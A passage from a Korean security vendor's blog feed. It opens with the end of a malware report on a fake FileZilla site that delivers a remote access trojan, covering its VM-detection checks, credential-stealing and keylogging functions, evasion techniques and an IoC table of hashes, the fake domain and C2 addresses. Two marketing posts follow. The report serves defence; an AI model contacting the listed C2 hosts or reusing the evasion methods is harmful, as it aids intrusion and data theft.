&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;vmnetadapter.sys&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;width: 50%; text-align: center;&quot;&gt;&lt;span&gt;VMware &lt;/span&gt;&lt;span&gt;네트워크 어댑터 드라이버&lt;/span&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;[표 2] &lt;span&gt;VMware &lt;/span&gt;&lt;span&gt;드라이버 체크리스트&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h4 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; margin: 30px 0px 15px; border-bottom: 1px solid #e0e0e0; font-family: Pretendard, sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size20&quot;&gt;RAT 주요 기능&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;최종 페이로드는 &lt;span&gt;RAT(Remote Access Trojan) &lt;/span&gt;악성코드로 확인되었으며&lt;span&gt;, &lt;/span&gt;공격자의 명령에 따라 다음과 같은 행위를 수행할 수 있습니다&lt;span&gt;.&lt;/span&gt;&lt;span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;정보 탈취 (Credential Theft)&lt;/b&gt; - 웹 브라우저 및 시스템에 저장된 인증 정보 수집&lt;/li&gt;
&lt;li&gt;&lt;b&gt;키 입력 수집 (Keylogging)&lt;/b&gt; - 사용자의 키 입력을 기록하여 민감 정보 수집&lt;/li&gt;
&lt;li&gt;&lt;b&gt;화면 캡처 (Screenshot Capture)&lt;/b&gt; - 감염된 시스템의 화면을 캡처하여 전송&lt;/li&gt;
&lt;li&gt;&lt;b&gt;원격 제어 (HVNC)&lt;/b&gt; - 숨겨진 가상 데스크톱 세션을 생성하여 원격 제어를 수행하는 HVNC 기능을 통해 사용자 몰래 웹 브라우저 실행, 추가 악성코드 다운로드, 내부 시스템 접근 등 악성 행위 수행&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 style=&quot;border-left: 8px solid #000000; padding: 12px 20px; background-color: #f8f9fa; color: #1a1a1a; font-weight: bold; margin: 30px 0px 15px; border-bottom: 1px solid #e0e0e0; font-family: Pretendard, sans-serif; letter-spacing: -0.5px;&quot; data-ke-size=&quot;size20&quot;&gt;&lt;b&gt;&lt;span&gt;공격 특징&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/h4&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 &lt;span&gt;FileZilla &lt;/span&gt;사칭 공격은 다음과 같은 보안 위협적 특징을 보입니다&lt;span&gt;.&lt;/span&gt;&lt;b&gt;&lt;span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;b&gt;사회공학적 공격&lt;/b&gt;: 취약점 악용이 아닌 사용자가 직접 악성 파일을 내려받도록 유도하는 사회공학적 기법을 활용&lt;/li&gt;
&lt;li&gt;&lt;b&gt;고도화된 탐지 우회 기법 활용&lt;/b&gt; : DLL 사이드로딩 및 다단계 로더, DoH 기술을 통해 엔드포인트/네트워크 탐지 차단&lt;/li&gt;
&lt;li&gt;&lt;b&gt;체계적인 타겟 관리&lt;/b&gt;: 식별 태그를 통한 유입 경로 추적 및 관리&lt;/li&gt;
&lt;li&gt;&lt;b&gt;분석방해 기법 적용&lt;/b&gt;: 다양한 시스템 지표를 대조하여 가상 머신 여부를 식별하고 분석 시도를 무력화&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 사례는 취약점 악용이 아닌 가짜 웹사이트와 악성코드가 삽입된 정상 프로그램을 이용한 사회공학적 공격으로 가짜 웹사이트를 통한 악성코드 유포가 여전히 활발히 이루어지고 있음을 보여줍니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;프로그램은 반드시 공식 사이트에서 다운로드하고&lt;span&gt;, &lt;/span&gt;출처가 불분명한 파일 실행을 자제하는 등 기본적인 보안 수칙을 준수하는 것이 무엇보다 중요합니다&lt;span&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;ioc-container&quot;&gt;
&lt;p style=&quot;font-weight: bold; color: #1a2c4e; margin-bottom: 15px;&quot; data-ke-size=&quot;size18&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;font-weight: bold; color: #1a2c4e; margin-bottom: 15px;&quot; data-ke-size=&quot;size18&quot;&gt;IoC&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;ioc-container&quot;&gt;
&lt;div class=&quot;ioc-container&quot;&gt;
&lt;table style=&quot;width: 99.3019%; border-collapse: collapse; line-height: 1.6; font-size: 14px; height: 70px;&quot; data-ke-align=&quot;alignLeft&quot;&gt;
&lt;thead&gt;
&lt;tr style=&quot;border-top: 2px solid #e1e4e8; border-bottom: 1px solid #e1e4e8; text-align: left; background-color: #fcfcfc; height: 22px;&quot;&gt;
&lt;th style=&quot;padding: 15px 10px; width: 41.2577%; color: #333333; height: 22px;&quot;&gt;Indicator&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 11.7619%; color: #333333; height: 22px;&quot;&gt;Type&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 19.5114%; color: #333333; height: 22px;&quot;&gt;Description&lt;/th&gt;
&lt;th style=&quot;padding: 15px 10px; width: 26.7787%; color: #333333; height: 22px;&quot;&gt;Detection Name&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 41.2577%; height: 24px;&quot;&gt;C608AC44ED1F4FE707B9520F87FB1564&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 11.7619%; height: 24px;&quot;&gt;MD5&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 19.5114%; height: 24px;&quot;&gt;DLL 파일&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.7787%; height: 24px;&quot;&gt;Backdoor.Agent.361984A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 41.2577%; height: 24px;&quot;&gt;9D7C559F1885EDE6911611165EFF07F7&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 11.7619%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;MD5&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 19.5114%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #666666; text-align: start;&quot;&gt;DLL 파일&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.7787%; height: 24px;&quot;&gt;Backdoor.Agent.361984A&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 41.2577%; height: 24px;&quot;&gt;D7C3ECB76C03C1C0AA98D4E2D71C2BCF&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 11.7619%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;MD5&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 19.5114%; height: 24px;&quot;&gt;FileZilla 설치파일&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.7787%; height: 24px;&quot;&gt;Trojan.Dropper.Agent&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 41.2577%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;filezilla-project[.]live&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 11.7619%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;DOMAIN&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 19.5114%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #666666; text-align: start;&quot;&gt;가짜 &lt;/span&gt;&lt;span style=&quot;color: #666666; text-align: start;&quot;&gt;FileZilla사이트&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.7787%; height: 24px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 41.2577%; height: 24px;&quot;&gt;hxxps://welcome.supp0v3[.]com/d/callback?utm_tag=tbs2&amp;amp;utm_source=dll&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 11.7619%; height: 24px;&quot;&gt;URL&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 19.5114%; height: 24px;&quot;&gt;C2&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.7787%; height: 24px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr style=&quot;border-bottom: 1px solid #e1e4e8; height: 24px;&quot;&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; word-break: break-all; width: 41.2577%; height: 24px;&quot;&gt;95.216.51[.]236:31415&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #444444; width: 11.7619%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #444444; text-align: start;&quot;&gt;IP&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 19.5114%; height: 24px;&quot;&gt;&lt;span style=&quot;color: #666666; text-align: start;&quot;&gt;C2&amp;nbsp;&lt;/span&gt;&lt;/td&gt;
&lt;td style=&quot;padding: 15px 10px; color: #666666; width: 26.7787%; height: 24px;&quot;&gt;&amp;nbsp;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>악성코드 분석 리포트</category>
      <author>알약4</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5738</guid>
      <comments>https://alyacofficialblog.tistory.com/5738#entry5738comment</comments>
      <pubDate>Fri, 13 Mar 2026 14:38:06 +0900</pubDate>
    </item>
    <item>
      <title>중소기업 기술보호 바우처 지원사업 - 보안 솔루션 구축 비용 최대 80% 지원 받으세요!</title>
      <link>https://alyacofficialblog.tistory.com/5735</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot; data-start=&quot;20&quot; data-end=&quot;260&quot; data-is-last-node=&quot;&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot; data-start=&quot;20&quot; data-end=&quot;260&quot; data-is-last-node=&quot;&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이스트시큐리티가 중소기업의 기술 보호 수준을 진단하고, 맞춤형 바우처를 통해 기업의 기술 보호 역량을 강화할 수 있도록 지원하는&amp;nbsp;&lt;b&gt;&amp;lsquo;기술보호 바우처 지원사업&amp;rsquo;&lt;/b&gt;을 시작했습니다.&amp;nbsp;이스트시큐리티와 함께 최대 80% 비용 지원 혜택을 받아 보안솔루션을 구축할 수 있는 이번 기회를 놓치지 마세요!&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot; data-start=&quot;20&quot; data-end=&quot;260&quot; data-is-last-node=&quot;&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot; data-start=&quot;20&quot; data-end=&quot;260&quot; data-is-last-node=&quot;&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;최종_popup_26.02.png&quot; data-origin-width=&quot;700&quot; data-origin-height=&quot;700&quot;&gt;&lt;a href=&quot;https://forms.office.com/Pages/ResponsePage.aspx?id=K0jd943FW0CuYFn2rDb-72BdvqB5QrJIqOpyt7G7ExVUNERFUjhUQkZUWlRJOTJRVkdBRldLVEJLUy4u&amp;amp;origin=Invitation&amp;amp;channel=0&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dfoLqv/dJMcah4FImD/i18TMuuzGqeuP6MkkK4mI1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdfoLqv%2FdJMcah4FImD%2Fi18TMuuzGqeuP6MkkK4mI1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;700&quot; height=&quot;700&quot; data-filename=&quot;최종_popup_26.02.png&quot; data-origin-width=&quot;700&quot; data-origin-height=&quot;700&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #ffffff; border: 1px solid #ced4da; border-radius: 8px; padding: 20px; margin: 20px 0; box-shadow: 0 2px 4px rgba(0,0,0,0.05);&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️ &lt;/span&gt;&lt;b&gt;신청기간&lt;/b&gt; : &lt;span&gt;'26. 3. 9(월) ~ '26. 3. 30(월)&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️ &lt;/span&gt;&lt;b&gt;지원 대상&lt;/b&gt; : 「&lt;/span&gt;중소기업기본법 」제 2조 및 시행령 제 3조에 따른 중소기업&lt;br /&gt;* 기존 사업 참여기업의 재신청 가능&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️ &lt;/span&gt;&lt;b&gt;지원혜택&lt;/b&gt; : 보안솔루션 도입비용 최대 80% 지원&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️ &lt;/span&gt;&lt;b&gt;신청방법&lt;/b&gt; : 기술보호울타리 홈페이지( &lt;a href=&quot;https://www.ultari.go.kr&quot;&gt;https://www.ultari.go.kr&lt;/a&gt; )에서 신청&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;background-color: #ffffff; color: #333333; text-align: start;&quot;&gt;▪️&lt;span&gt;&lt;b&gt; 관련 문의&lt;/b&gt; : 이스트시큐리티 김새연 대리 (02-3470-2984)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 - 2026-03-09T135128.352.png&quot; data-origin-width=&quot;816&quot; data-origin-height=&quot;622&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/9e5IA/dJMcadHU3Dp/KauX4CHvF90lVU8RIYQWi1/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/9e5IA/dJMcadHU3Dp/KauX4CHvF90lVU8RIYQWi1/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/9e5IA/dJMcadHU3Dp/KauX4CHvF90lVU8RIYQWi1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F9e5IA%2FdJMcadHU3Dp%2FKauX4CHvF90lVU8RIYQWi1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;816&quot; height=&quot;622&quot; data-filename=&quot;다운로드 - 2026-03-09T135128.352.png&quot; data-origin-width=&quot;816&quot; data-origin-height=&quot;622&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;다운로드 - 2026-03-09T135135.135.png&quot; data-origin-width=&quot;790&quot; data-origin-height=&quot;486&quot;&gt;&lt;a href=&quot;https://forms.office.com/Pages/ResponsePage.aspx?id=K0jd943FW0CuYFn2rDb-72BdvqB5QrJIqOpyt7G7ExVUNERFUjhUQkZUWlRJOTJRVkdBRldLVEJLUy4u&amp;amp;origin=Invitation&amp;amp;channel=0&quot; target=&quot;_blank&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/brlFM6/dJMcafy1X3Y/vGZ75mOt2RY7YbhznnyKf1/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FbrlFM6%2FdJMcafy1X3Y%2FvGZ75mOt2RY7YbhznnyKf1%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;790&quot; height=&quot;486&quot; data-filename=&quot;다운로드 - 2026-03-09T135135.135.png&quot; data-origin-width=&quot;790&quot; data-origin-height=&quot;486&quot;/&gt;&lt;/a&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-is-last-node=&quot;&quot; data-end=&quot;260&quot; data-start=&quot;20&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-is-last-node=&quot;&quot; data-end=&quot;260&quot; data-start=&quot;20&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333; text-align: start;&quot;&gt;기술 유출 예방과 맞춤형 보안 컨설팅 및 지원이 필요한 기업 고객들은&lt;span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;이스트시큐리티와 함께 바우처 신청을 위한 준비를 시작해 보시길 바랍니다!&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-is-last-node=&quot;&quot; data-end=&quot;260&quot; data-start=&quot;20&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div style=&quot;background-color: #f8f9fa; border-left: 5px solid #dee2e6; padding: 15px 20px; margin: 20px 0; color: #495057;&quot;&gt;
&lt;p style=&quot;margin: 0; font-weight: bold;&quot; data-ke-size=&quot;size16&quot;&gt;문의처&lt;/p&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;이스트시큐리티 김새연 대리&lt;/p&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;02-3470-2984&lt;/p&gt;
&lt;p style=&quot;margin: 10px 0 0 0;&quot; data-ke-size=&quot;size16&quot;&gt;saeyeon96@estsecurity.com&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>기술보호바우처지원사업</category>
      <category>이스트시큐리티</category>
      <category>중소기업바우처</category>
      <category>중소기업보안</category>
      <category>중소기업보안솔루션</category>
      <category>중소기업지원사업</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5735</guid>
      <comments>https://alyacofficialblog.tistory.com/5735#entry5735comment</comments>
      <pubDate>Mon, 9 Mar 2026 13:59:27 +0900</pubDate>
    </item>
    <item>
      <title>파일이 흩어지면 보안도 흩어진다! 구축형 프라이빗 클라우드 스토리지, '인터넷디스크'</title>
      <link>https://alyacofficialblog.tistory.com/5733</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;여러분의 조직에서 중요한 문서는 지금 어디에, 어떻게 저장되고 있나요? 직원 개인 PC에 흩어진 파일들, USB로 주고받는 자료, 메신저로 공유되는 기밀 문서들... 보안 담당자라면 한 번쯤 '우리 데이터가 과연 안전한가?'라는 불안함을 느껴보셨을 겁니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;클라우드 전환과 원격&amp;middot;재택근무가 일상화된 오늘날, 업무 데이터의 분산과 유출 위험은 기업 보안의 핵심 과제가 되었습니다. 이제는 단순히 파일을 저장하는 것을 넘어, 보안이 내재된 협업 환경이 필요한 시대입니다. 오늘은 이스트시큐리티의 구축형 프라이빗 클라우드 스토리지 솔루션, &lt;a href=&quot;https://www.estsecurity.com/enterprise/product/internetdisk&quot; target=&quot;_blank&quot; rel=&quot;noopener&quot;&gt;&lt;b&gt;'인터넷디스크(InternetDisk)'&lt;/b&gt;&lt;/a&gt; 를 소개합니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;스크린샷 2026-03-03 18.24.54 1.png&quot; data-origin-width=&quot;1056&quot; data-origin-height=&quot;813&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/CVDD9/dJMcadVoxdZ/quJt617VNCpKffKPULR7bK/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/CVDD9/dJMcadVoxdZ/quJt617VNCpKffKPULR7bK/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/CVDD9/dJMcadVoxdZ/quJt617VNCpKffKPULR7bK/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FCVDD9%2FdJMcadVoxdZ%2FquJt617VNCpKffKPULR7bK%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1056&quot; height=&quot;813&quot; data-filename=&quot;스크린샷 2026-03-03 18.24.54 1.png&quot; data-origin-width=&quot;1056&quot; data-origin-height=&quot;813&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&amp;nbsp;&lt;/h3&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;color: #006dd7;&quot;&gt;&lt;b&gt;왜 지금 파일 관리 보안을 다시 점검해야할까?&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt; &lt;b&gt;&lt;span&gt;&amp;nbsp;&lt;/span&gt;개인 PC에 흩어진 업무 데이터의 위험&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;많은 조직에서 업무 문서는 여전히 직원 개인 PC에 분산 저장됩니다. 퇴직자가 발생하거나, 랜섬웨어 공격을 받으면 중요 데이터가 순식간에 사라지거나 외부로 유출될 수 있습니다. '그 파일 누가 갖고 있죠?'라는 질문이 반복되는 조직이라면, 지금이 바로 구조를 바꿀 때입니다.&lt;/p&gt;
